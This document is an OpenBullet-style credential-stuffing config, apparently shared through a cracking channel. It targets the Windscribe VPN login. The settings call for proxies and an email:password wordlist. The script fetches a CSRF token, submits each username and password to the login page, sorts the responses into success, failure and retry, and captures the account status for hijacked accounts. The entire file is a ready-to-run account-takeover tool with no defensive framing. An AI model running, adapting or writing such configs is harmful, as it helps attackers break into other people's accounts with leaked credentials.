[SETTINGS]
{
  "Name": "windscribe",
  "SuggestedBots": 107,
  "MaxCPM": 0,
  "LastModified": "2019-08-03T05:50:53.0002963+00:00",
  "AdditionalInfo": "",
  "Author": "modified",
  "Version": "1.1.3",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#K REQUEST POST "https://res.windscribe.com/res/logintoken" 
  CONTENT "post" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://windscribe.com/login" 
  HEADER "Origin: https://windscribe.com" 

#A PARSE "<SOURCE>" JSON "csrf_token" -> VAR "TOKEN" 

#M PARSE "<SOURCE>" JSON "csrf_time" -> VAR "TIME" 

#İ REQUEST POST "https://windscribe.com/login" 
  CONTENT "login=1&upgrade=0&csrf_time=<TIME>&csrf_token=<TOKEN>&username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://windscribe.com/login" 
  HEADER "Origin: https://windscribe.com" 

#leec KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "content_message error" 
  KEYCHAIN Success OR 
    KEY "myaccountpage" 
  KEYCHAIN Retry OR 
    KEY "Invalid CSRF Token" 

#her PARSE "<SOURCE>" LR "<strong>" "<" -> CAP "STATUS" "" "https://t.me/crackerworldd" 

